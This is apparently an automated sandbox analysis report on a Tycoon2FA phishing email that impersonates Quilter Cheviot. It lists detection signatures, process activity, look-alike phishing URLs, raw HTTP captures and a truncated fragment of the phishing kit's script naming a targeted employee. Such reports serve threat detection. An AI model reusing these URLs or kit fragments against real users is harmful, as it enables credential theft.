Windows Analysis Report
message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml

Overview

General Information

Sample name: message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml
Analysis ID: 1641941
MD5: 11e0e238d10996702dcef9893e69bfba
SHA1: 2be67d6f4f21992b9dcc642154d174596a2f87b1
SHA256: 66101f19ed9097e71c47e841316729e51b48442dd77dbc9e75a2e38e48fdd60b

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
AI detected suspicious URL
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Levels: clean, suspicious, malicious.]
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 2468 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 2460 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7DF7246-10A0-4098-9443-EDC4BD1936C6" "66FD239E-9DE5-46C9-9CD3-55A0C6CBD113" "2468" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 4604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RNAYJ7P1\9114950926.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 3284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,10470063623338701964,3264311356742323731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Source | Rule | Description | Author | Strings
dropped/chromecache_92 | JoeSecurity_HangulCharacter | Yara detected Obfuscation Via HangulCharacter | Joe Security |

Source | Rule | Description | Author | Strings
1.7..script.csv | JoeSecurity_Tycoon2FA_1 | Yara detected Tycoon 2FA PaaS | Joe Security |
1.1.d.script.csv | JoeSecurity_Tycoon2FA_1 | Yara detected Tycoon 2FA PaaS | Joe Security |
1.1.d.script.csv | JoeSecurity_AntiDebugBrowser | Yara detected AntiDebug via timestamp check | Joe Security |
1.2.d.script.csv | JoeSecurity_HangulCharacter | Yara detected Obfuscation Via HangulCharacter | Joe Security |
1.2.d.script.csv | JoeSecurity_InvisibleJS | Yara detected Invisible JS | Joe Security |
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
Source: Registry Key set | Author: frack113 | Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RNAYJ7P1\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.18, DestinationIsIpv6: false, DestinationPort: 49709, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, Initiated: true, ProcessId: 2468, Protocol: tcp, SourceIp: 52.123.131.14, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Phishing
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | Joe Sandbox AI: Score: 9. Reasons: The brand 'Quilter' is associated with Quilter Cheviot, a known investment management company. The legitimate domain for Quilter Cheviot is 'quiltercheviot.com'. The provided URL 'quiltercheviot.uuvght.ru' does not match the legitimate domain. The domain extension '.ru' is unusual for a UK-based investment company like Quilter Cheviot. The presence of a password input field on a suspicious domain increases the risk of phishing. DOM: 2.4.pages.csv
Source: Yara match | File source: 2.3.pages.csv, type: HTML
Source: Yara match | File source: 2.4.pages.csv, type: HTML
Source: Yara match | File source: 2.5.pages.csv, type: HTML
Source: Yara match | File source: 1.2.d.script.csv, type: HTML
Source: Yara match | File source: 1.0.pages.csv, type: HTML
Source: Yara match | File source: 1.1.pages.csv, type: HTML
Source: Yara match | File source: 2.19..script.csv, type: HTML
Source: Yara match | File source: dropped/chromecache_92, type: DROPPED
Source: Yara match | File source: 2.17.d.script.csv, type: HTML
Source: Yara match | File source: 1.7..script.csv, type: HTML
Source: Yara match | File source: 1.1.d.script.csv, type: HTML
Source: Yara match | File source: 2.12..script.csv, type: HTML
Source: Yara match | File source: 1.10.d.script.csv, type: HTML
Source: Yara match | File source: 2.13..script.csv, type: HTML
Source: 1.3..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://quiltercheviot.uuvght.ru/nTJ777/... The script contains obfuscated code and URLs, uses dynamic code execution with eval, and interacts with a suspicious domain (pq.uuvght.ru). These high-risk indicators suggest potentially malicious behavior.
Source: 1.2.d.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... The script uses dynamic code execution via eval, which is a high-risk indicator. It also contains obfuscated code, another high-risk indicator. These behaviors suggest potential malicious intent, especially given the lack of transparency and the use of obfuscation.
Source: 0.0..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://y13tzxbjz1.moydow.de/DzC0pn01Csl0xBhEB8ZuB... The script constructs a URL using a potentially extracted subdomain from an email or a random string, then redirects to a suspicious domain (uuvght.ru). This behavior is indicative of phishing or malicious redirection, as it manipulates the URL and redirects without user consent. The use of a suspicious domain and the redirection logic contribute to a high-risk score.
Source: 1.9..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://quiltercheviot.uuvght.ru/nTJ777/... The script uses dynamic code execution via the Function constructor with base64-decoded content, which is a high-risk indicator. It also manipulates the window location to redirect to 'about:blank' and potentially 'https://google.com', suggesting suspicious behavior. The use of obfuscated code and potential data exfiltration or redirection to untrusted domains further increases the risk.
Source: https://quiltercheviot.uuvght.ru | Joe Sandbox AI: The URL 'https://quiltercheviot.uuvght.ru' appears to be targeting the brand 'Quilter Cheviot', a known investment management firm. The domain 'uuvght.ru' does not have any clear association with Quilter Cheviot, and the use of a '.ru' domain extension could be misleading, as it is not the typical domain extension used by the legitimate brand. The subdomain 'quiltercheviot' directly uses the brand name, which increases the likelihood of user confusion. There are no obvious character substitutions, but the structural use of the brand name in the subdomain suggests a potential typosquatting attempt. The similarity score is high due to the direct use of the brand name, and the spoofed score is also high due to the misleading domain extension and potential for user confusion.
Source: Email | Joe Sandbox AI: Detected potential phishing email: Sender domain 'servis.ai' does not match the claimed sender organization 'quiltercheviot.com'. SVG attachment is a high-risk file type commonly used in phishing attacks. Generic printer notification format but using suspicious domain and mismatched sender info.
Source: Email | Joe Sandbox AI: Detected suspicious elements in Email header: Proofpoint spam details indicate a high phish score of 100, suggesting phishing intent. Received header shows an unknown sender IP [100.64.100.6], which is suspicious. Proofpoint classifier explicitly labels the email as 'phish'. Priority score of 1501 in Proofpoint headers indicates high risk. No authentication results provided, increasing suspicion.
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: Number of links: 0
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://quiltercheviot.uuvght.ru/nTJ777/#Krichard.thorn%40quiltercheviot.com | HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Graphic Card Web Template</title> <style> body { font-family: 'Montserrat', sa...
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: Title: Enter Protected Profile Access does not match URL
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: Invalid link: Terms of use
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: Invalid link: Privacy & cookies
Source: https://quiltercheviot.uuvght.ru/nTJ777/ | HTTP Parser: function jqeshhapyd(){mldwokqpiy = atob("...
Source: anonymous function | HTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "x6avo";var emailcheck = "richard.thorn@quiltercheviot.com";var webname = "rtrim(/web9/, '/')";var urlo = "/xhssg433q0vlfxw282t0j4tzvt2ieeywr92lvd7p2bpmjtla0peiebuzk";var gdf = "/ghdqwdfam7lugmdptisbtuvuhs8drb9m344njmtijab116";var odf = "/ghlxxpzqvplzj9q6lp9y3e0fyzccmejen5dmcd648";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;...
Source: Email | Classification: Credential Stealer
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: <input type="password" .../> found
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: No favicon
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: No <meta name="author".. found
Source: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW | HTTP Parser: No <meta name="copyright".. found
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.18:49709 -> 52.123.131.14:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.185.131
Source: unknown | TCP traffic detected without corresponding DNS query: 199.232.214.172
                Source: global trafficHTTP traffic detected: GET /rq6hFLBxsRd99C5DxuUMgquYKDtkJqNXasAmjDrY34q9gy HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inl0bWlhakhvRU91NjEzOUdpS1BiUUE9PSIsInZhbHVlIjoiZ3J1MEhma3BsdGJPR1l6eXk4clVndmNob015MjRsSERWQ1pvUEtGN05ZNUpnaUlqOEJ6MnR3WXF3K0FpN1N5blhsUEZIZlh3Q1p5ZHBoemJKNUlkN2lJYkkwQmw5SFBjeDhqL0xIUDdNdlI5N1VRVUhGcjI3ajY4a1RjazRXQW0iLCJtYWMiOiJmMmQzYWU4YmFjYTUxMGJlOWRhZmYxZGUzNTM0NzNmZTc5MTI0YzVhYjZiZjdmMzIxNDg1NDc3MDdjYjUyYTc0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVtalBQUGNiclhHdmJyQW9abnJnTGc9PSIsInZhbHVlIjoidElKSW9JNGpXZ1d1VVdYT1pFSnVsZEZIQXM1eFdkQWdML0M2VDhZcC83UHdyc1FuWDNZOHgzcG1TbHhPa200d09KMURGVU5XRlVSa2J3eWE0alNNdWdTMytoNkZPNCt6YVZKMGlOKzh2d0RVbUZHTE5NL0F2eGxKTzF3WURsMFciLCJtYWMiOiI5Y2QxODk4MTE5ZDg4ZDI3MzdkMjk3OWQwYWQ2ZmI5MThmYzU1ZjU2ODdjOTE4MWNjNjU2N2MzMTJhZGUwYjU3IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXW HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://quiltercheviot.uuvght.ru/nTJ777/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Inl0bWlhakhvRU91NjEzOUdpS1BiUUE9PSIsInZhbHVlIjoiZ3J1MEhma3BsdGJPR1l6eXk4clVndmNob015MjRsSERWQ1pvUEtGN05ZNUpnaUlqOEJ6MnR3WXF3K0FpN1N5blhsUEZIZlh3Q1p5ZHBoemJKNUlkN2lJYkkwQmw5SFBjeDhqL0xIUDdNdlI5N1VRVUhGcjI3ajY4a1RjazRXQW0iLCJtYWMiOiJmMmQzYWU4YmFjYTUxMGJlOWRhZmYxZGUzNTM0NzNmZTc5MTI0YzVhYjZiZjdmMzIxNDg1NDc3MDdjYjUyYTc0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVtalBQUGNiclhHdmJyQW9abnJnTGc9PSIsInZhbHVlIjoidElKSW9JNGpXZ1d1VVdYT1pFSnVsZEZIQXM1eFdkQWdML0M2VDhZcC83UHdyc1FuWDNZOHgzcG1TbHhPa200d09KMURGVU5XRlVSa2J3eWE0alNNdWdTMytoNkZPNCt6YVZKMGlOKzh2d0RVbUZHTE5NL0F2eGxKTzF3WURsMFciLCJtYWMiOiI5Y2QxODk4MTE5ZDg4ZDI3MzdkMjk3OWQwYWQ2ZmI5MThmYzU1ZjU2ODdjOTE4MWNjNjU2N2MzMTJhZGUwYjU3IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /56ybfCjabGpJyUZ8916 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /xyrN6azxUjCRpqSzcd26 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNTMTBOaDB3alpaMllPVGl4dXNYVmc9PSIsInZhbHVlIjoiZ3JlZnF0dWtaeHN2RTJVVDJqTjY0TU12ditIeWdDNzF6TzNYMThrREFBcEJ2SUhkVy9TWW5IZXVIczNqeFIvcS9mME5XTUZTT3EvRU54Z2IrWCtzaFZsVnExRXpFelhRNVRwVk16clRFRUZiMzFKQklGVTdlWGgxcEU1RmltOG8iLCJtYWMiOiI4MDYzOTUxNzNiZjQwNTE2MzBlYTNkOWEyOTk0MjAxZTQ5NzViY2Y2ODQ3MDFjZjNmNmE4ZjFlYzY3OTVhZGM4IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveOrigin: https://quiltercheviot.uuvght.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjRaQVhzTEFKNVk1TEJCYXQ2UUdTVkE9PSIsInZhbHVlIjoiQTFCbDNLM2ZvOGd5dXNWSWxXTjZENVN3ckV4L0R4cVRrYVpFYk1VODd5RHhJU01UVFBPZkxtd2lFYXVlRU5vTDZ0REZpemNPL21qMEdndVc5c09UK0xIRHpPY25WbjNUM2hOU1lNZ1liaVp1cVdVcVZWZzNwRndzaEQ3cFUveUIiLCJtYWMiOiIzYTI2ZTJmZmU2ZTNhYTI0MjQ2Y2YzMGQzNDVhMmQzZDU0Mzg0ZjlmYzFlMTVmN2RiYWU0NjkwMWM2NzZiMjU3IiwidGFnIjoiIn0%3D; 